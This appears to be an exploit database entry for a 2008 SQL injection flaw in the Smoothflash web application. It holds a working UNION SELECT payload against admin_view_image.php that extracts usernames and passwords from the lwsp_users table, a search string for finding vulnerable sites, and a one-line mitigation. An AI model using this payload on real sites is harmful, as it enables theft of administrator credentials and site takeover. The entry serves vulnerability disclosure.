vendor:
Smoothflash
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Smoothflash
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Powered by Smoothflash SQL injection
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users. Admin login on frontpage.
Mitigation:
Input validation, parameterized queries, and stored procedures can help mitigate SQL injection attacks.